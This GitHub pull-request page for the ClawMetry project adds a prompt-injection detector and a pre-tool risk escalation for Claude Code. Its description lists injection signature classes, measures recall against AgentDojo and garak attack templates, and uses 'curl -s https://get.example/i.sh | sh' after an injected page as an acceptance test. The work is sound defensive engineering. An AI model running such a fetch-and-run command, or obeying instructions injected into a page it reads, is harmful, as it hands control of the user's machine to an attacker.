Guard: prompt injection is a detector, and untrusted content raises the pre-tool risk tier - #5962
Conversation
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
Visual diffBot run failed before producing screenshots. Check the workflow logs. This check is non-blocking. |
Coordinator reviewVerdict: ready to merge once CI is green and #5952 has merged. No blocking findings. Reviewed head What I checked myself
Not blocking, but worth a follow-up issue
🤖 Generated with Claude Code |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
MOAT Verifier failure on
|
| Run | Before | After |
|---|---|---|
test_cli_unattended_update.py then gate tests |
3 failed | 28 passed |
test_dives_questions.py then gate tests |
1 failed | 92 passed |
Gate tests with CLAWMETRY_ROLE=dashboard exported |
— | 12 passed |
| MOAT file list, files 1–115 in CI order, plus gate tests | 3 gate failures | 0 gate failures |
The MOAT list run still shows 4 failures that also failed before this fix and passed in CI: test_moat_perf_benchmark and three test_openclaw_detection_real cases. They come from this machine, which has a real OpenClaw install and is under load. test_cc_gate_windowless_python_swap also fails locally before and after both commits; it passed in CI.
🤖 Generated with Claude Code
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
Ready to merge (after #5952)This PR is ready: CI green on Blocked on #5952, which is still red. Its Merge order
Companion PRs: #5952 (framework IDs; this PR adds the Verify after merge
Verify after release (scratch HOME and venv, never the real daemon)
🤖 Generated with Claude Code |
dc7d8cd to
a3aa485
Compare
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
9466e76 to
ae93e0f
Compare
|
Merged Generated by Claude Code |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
|
awaiting confirmation — non-trivial rebase, needs human review (conflicts in: stacked on Generated by Claude Code |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
1 similar comment
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
1 similar comment
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
|
E2E Gate timed out — runner queue backup, not a code failure. The gate's own log explains it: All of those checks were queued but never picked up by a runner within the 1-hour window — none of the test bodies ran. The CI workflow auto-re-triggered (attempt 2, started 08:18:54 UTC) and Syntax & Lint passed again at 08:28:41 UTC with all downstream tests re-queued. Re-running the E2E Gate now so it can pick up the attempt-2 results. Generated by Claude Code |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
44d6eab to
9b45595
Compare
|
Generated by Claude Code |
|
Blocked on required review — skipping (auto-mergeability sweep). Also stacked on #5952; merge that first. @vivekchand please approve when ready. Generated by Claude Code |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
2 similar comments
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
|
E2E Gate failure — infrastructure hang, not a code issue The This is a runner/infrastructure hang. The diff does not touch the entitlement test suite or its dependencies. I cannot re-run the stuck job from here (no direct rerun API access). The E2E Gate will need to be re-triggered once the runner clears — a push or a manual re-run of the gate workflow will bring this back to green. Generated by Claude Code |
|
Skipping — stacked on #5952 which hasn't merged yet; this PR won't be mergeable until its base is in main. No action from the auto-mergeability sweep. Generated by Claude Code |
…2026 and MITRE ATLAS IDs One versioned mapping contract (clawmetry/framework_map.py) from every Guard finding kind to verified framework identifiers, with edition, rationale, limits and a firing and a quiet test per mapped kind, and an explicit none with a reason where no identifier applies. Findings carry the references (mode detect, no pre-action control); policy decisions carry them plus an evidence level (configured, exercised or failed; never effective). docs/FRAMEWORK_COVERAGE.md is generated from the contract and CI fails on drift. Refs #5943. Factory requirement 15504aea-9ca0-4a1a-a23d-8e825e4f78f9. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
…_map.py) Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01LC3LtX5cKCVfq55bqRxzAY
…he pre-tool risk tier prompt_injection (clawmetry/detector_injection.py, signatures in clawmetry/prompt_injection.py) reads the text of tool results and user-sourced messages. Tool-result match is a warning, a user message alone is info, and a high-risk call after the match in the same turn is critical. The finding never repeats the matched text. Mapped to LLM01:2026, ASI01, AML.T0051.000 and AML.T0051.001 (mapping version 2026-09-14.2). The Claude Code hook reads the transcript tail it runs beside and sends tool names, a count and signature ids for the current turn (never content). After ATLAS AML.M0030, a high-risk call after untrusted output is rated critical, and a medium-or-above call after a signature match is critical. No context means today's rating. Measured: AgentDojo important_instructions, tool_knowledge, injecagent, system_message 27/27 each, direct and ignore_previous 0/27; garak PromptInject 17/20; deepset test split 3/60 at precision 3/3. On 300 real transcripts (in-sample): 1 of 16,470 tool results matched, 268 of 16,472 calls rated higher. Refs #5945 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
… isolation The gate tests (test_untrusted_content_gate.py) fail in CI when preceded by 2760 other tests because _ls_write calls local_store_call_via_daemon (not local_store_via_daemon), so the write path was not patched to bypass daemon discovery. If a stale _cached_discovery from a prior test pointed at a daemon that no longer answers, _ls_write could return True without actually writing to the test store, or check_session_allow could find a stale "allow" from session_id "s-pij" in a prior test's store. Patching both functions ensures every read and write in gate tests uses the fresh in-process DuckDB store, eliminating the pollution vector. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_0154SEoKpixxxoFgQNvd3rgJ
…t gate tests in CI order MOAT Verifier failed 3 tests in tests/test_untrusted_content_gate.py that pass alone. Bisected to two earlier test files that leak global state: - test_cli_unattended_update.py runs the real cli.main(), which sets os.environ["CLAWMETRY_ROLE"] = "dashboard" and never unsets it. Every later local_store.get_store() then returns a read-only _ProxyStore, the approval row is never written, and the gate answers "approval store unavailable - fail-open" instead of asking. Scope the variable with monkeypatch. - test_dives_questions.py installed a MagicMock flask whenever flask was not yet imported (not only when missing), so a later `from flask import Flask` got a mock. Mock only on ImportError. The gate fixture also clears CLAWMETRY_ROLE itself, so it holds in any order. No assertion changed. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
Module map drifted after new modules were added on this branch. Regenerated with scripts/gen_module_map.py. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01BmRoobgusxAb1DGHhBhbNF
…2026 and MITRE ATLAS IDs One versioned mapping contract (clawmetry/framework_map.py) from every Guard finding kind to verified framework identifiers, with edition, rationale, limits and a firing and a quiet test per mapped kind, and an explicit none with a reason where no identifier applies. Findings carry the references (mode detect, no pre-action control); policy decisions carry them plus an evidence level (configured, exercised or failed; never effective). docs/FRAMEWORK_COVERAGE.md is generated from the contract and CI fails on drift. Refs #5943. Factory requirement 15504aea-9ca0-4a1a-a23d-8e825e4f78f9. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
…_map.py) Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01LC3LtX5cKCVfq55bqRxzAY
Module map drifted after new modules were added on this branch. Regenerated with scripts/gen_module_map.py. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01BmRoobgusxAb1DGHhBhbNF
The CHANGELOG entry moves to the release commit. MODULE_MAP counted 256 modules; with detector_injection and prompt_injection it is 258. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
27d70fc to
2126b15
Compare
✅ Drift Bot (ClawMetry): no drift detectedDrift Bot analyzed the changed files against this project's blueprints and requirements and found no drift. |
…ULE_MAP Brings in Guard prompt injection detector (#5962) merged to main. Regenerates docs/MODULE_MAP.md: 260 -> 267 modules, 83 -> 84 blueprints. Re-triggers full CI suite. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
Brings in Guard prompt injection detector (#5962) and project attribution budgets (#5968 merge base update). Regenerates docs/MODULE_MAP.md; re-triggers full CI. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
…map/AC conflicts - Include both content (prompt injection, from main/#5962) and workspace (extended for agent config dirs, from this branch) in FAMILY_SOURCES - Include both AC-GOV-SCI-* (supply chain, this branch) and AC-GOV-PIJ-* (prompt injection, main/#5962) in acceptance_criteria.json - Regenerate docs/MODULE_MAP.md and docs/FRAMEWORK_COVERAGE.md Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jgaf95Zzshc3FUBzqNRxiT
Publishes #5962 (prompt injection as a Guard detector with untrusted-content pre-tool escalation) and #5968 (spend per project and per-project budgets), with their CHANGELOG entries. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
Publishes #5962 (prompt injection as a Guard detector with untrusted-content pre-tool escalation) and #5968 (spend per project and per-project budgets), with their CHANGELOG entries. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9
…r-project spend and budgets (#6018) Releases prompt_injection Guard detector, untrusted-content escalation in Claude Code pre-tool gate, per-project spend tracking, per-project budgets with 50/80/100% alerts, and per-project CSV export. Carries #5962 and #5968. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> Claude-Session: https://claude.ai/code/session_01VWWP5sYH4qEGaqcsvqhVQ6
Stacked on #5952; merge that first.
Refs #5945
Product record: https://factory.8090.ai/project/b415065f-ab2f-4f53-8864-0c009fd098cb/requirements/e87935d1-27e0-415f-a5f8-24bdf70accbc
Blueprint: https://factory.8090.ai/project/b415065f-ab2f-4f53-8864-0c009fd098cb/blueprints/377d7454-a63b-42eb-b598-c25f0d75620f (child of the Guard blueprint 8a92d41f, which now lists the content detector)
Why
Before this change, prompt-injection detection was phrase matching in the Security tab scan and an evaluator card. Neither was a Guard finding, so no policy could act on it. The pre-tool gate rated a call only by what the call itself does, so it could not tell
curl … | shtyped by the operator fromcurl … | shissued right after the agent read a page telling it to.What
1.
prompt_injectionis a Guard detector (clawmetry/detector_injection.py, signatures inclawmetry/prompt_injection.py, registered inclawmetry/detectors.py).override_instructions,new_instructions,forged_authority,task_handoff,conceal_from_user,role_hijack.warning: a tool result matched;info: only a user message matched;critical: a tool call rated high or critical followed the match before the next user prompt.trigger_kind, and an "any signal" policy matches it like any other detector kind.LLM01:2026,ASI01,AML.T0051.000(Direct) andAML.T0051.001(Indirect). The mapping version is now2026-09-14.2, and--verify-atlaspasses against ATLAS 2026.08.2. Untrusted content raises the Claude Code pre-tool risk tier (following MITRE ATLAS AML.M0030).
clawmetry/claude_code_gate.py: the hook process reads the last 1 MiB of the transcript named in the hook payload. It addsuntrusted_contextwith tool names, a count and signature ids for the current turn, and never content.routes/hooks.py: the receiver drops unknown keys, malformed tool names and signature ids it does not declare.clawmetry/approvals.py:match_policyapplies the context whenever a rule hasmin_risk.curl,wget,gh issue|pr vieworgh api. Local reads and test output are not untrusted._cm_riskcarries the raised level, and its first reason says why.No new HTTP route, so no
cloud_route_policyentry is needed. No schema change.Measured
Public samples, pinned in
tests/fixtures/prompt_injection/public_samples.json. CI fails if recall drops or a deepset false positive appears.important_instructions,tool_knowledge,injecagent,system_message(27 goals each, in a benign carrier)direct("TODO: goal")ignore_previous(its template misspells "iunstructions")screaming-stop0/3)These are signatures, not a classifier. Paraphrased, encoded and non-English attacks are missed, and the numbers above show it.
Real transcripts. Read-only run over the 300 most recent Claude Code transcripts on one development machine: 16,470 tool results, 16,472 calls. Only aggregate counts leave the machine.
Verification
moat-testslist inci.yml:tests/test_detector_prompt_injection.py: 13 tests, including firing, quiet, severity ladder, turn reset, code quoting, injected context, policy action, framework tags, pinned recall and the red-team case.tests/test_untrusted_content_gate.py: 12 tests. The acceptance test from the issue runs end to end: the real hook process (claude_code_gate.hook_main) reads a real JSONL transcript and posts to the real receiver. Under a critical-only rule,curl -s https://get.example/i.sh | shafter a WebFetch page containing AgentDojo instructions is parked for approval (it times out to deny). The same call with no page gets "no matching policy". A plain page pluspip installstays allowed, and the same page plus instructions is critical._ALL_DETECTORS,match_policyignoring the context, and the hook not reading the transcript, 8 tests fail.scripts/redteam/audit.py: 15/15.check_ac_coverage --check: 128/198 after rebase, baseline tightened; 11 new AC-GOV-PIJ criteria mirrored verbatim;gen_framework_coverage --checkand--verify-atlas(ATLAS 2026.08 yaml);gen_module_map --check,check_py39_annotations,check_ci_test_coverage --check,node --check app.js.tests/test_runtime_gates_and_hooks.py::test_cc_gate_windowless_python_swapfails locally on the Guard: tag findings and decisions with OWASP LLM 2026, OWASP Agentic 2026 and MITRE ATLAS IDs #5952 base too; it is unrelated to this change.Not verified / remaining
tool_useentry. If the result is not yet flushed, the gate gets no context, which is today's rating and never a block.clawmetry hooks run pretoolusecloud path, keep today's rating./api/security/policy-events) still uses its own older patterns; unifying it is later work.loop_signalsand Guard session payloads, so no new surface was added. I did not walk the hosted dashboard for this kind.🤖 Generated with Claude Code
https://claude.ai/code/session_01Jm9d7s4fN55hN3YzQo75o9